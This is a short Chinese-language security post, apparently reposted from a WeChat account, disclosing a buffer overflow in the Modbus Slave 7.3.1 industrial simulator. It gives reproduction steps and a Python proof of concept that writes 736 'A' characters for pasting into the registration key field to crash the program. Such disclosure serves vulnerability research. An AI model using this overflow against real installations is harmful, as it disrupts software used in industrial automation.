Modbus Slave 7概述:
Modbus Slave是一款可在32个窗口中模拟多达32个从站设备,以促进更快的PLC编程过程的软件工具,对于从事与工业发展有关的系统自动化(例如机械,工厂装配线以及适合该领域的任何其他项目)的人们来说是一个有用的实用程序。您可以在32个独立的窗口中执行测试并模拟多达32个设备,从而加快PLC编程速度。在供应商交付从设备之前,可以进行仿真。从属设备生成的所有数据都是兼容的,并且易于被主应用程序访问,并且具有与Modbus Poll相同的UI。它还支持以下功能:01、02、03、04、05、06、15、16、22和23。
Modbus Slave 7下载:
https://modbustools.com/download.html
测试环境如下:
Windows XP SP3 – Windows 7 Professional x86 SP1 – Windows 10 x64
重现步骤:
#1. – 下载并安装 Modbus Slave
# 2. – 运行 python 脚本,它将创建 modbus.txt 文件。
# 3. – Modbus Slave 7.3.1 < 7.4.2
# 4. – 连接 -> 连接
# 5. – 将 txt 文件的字符粘贴到注册码
# 6. – 按“确定”按钮
# 7. – 崩溃
POC:
#!/usr/bin/pythonexploit = 'A' * 736try:file = open("Modbus.txt","w")file.write(exploit)file.close()print("POC is created")except:print("POC not created")
原文始发于微信公众号(暗影安全):Modbus Slave 7.3.1 缓冲区溢出POC
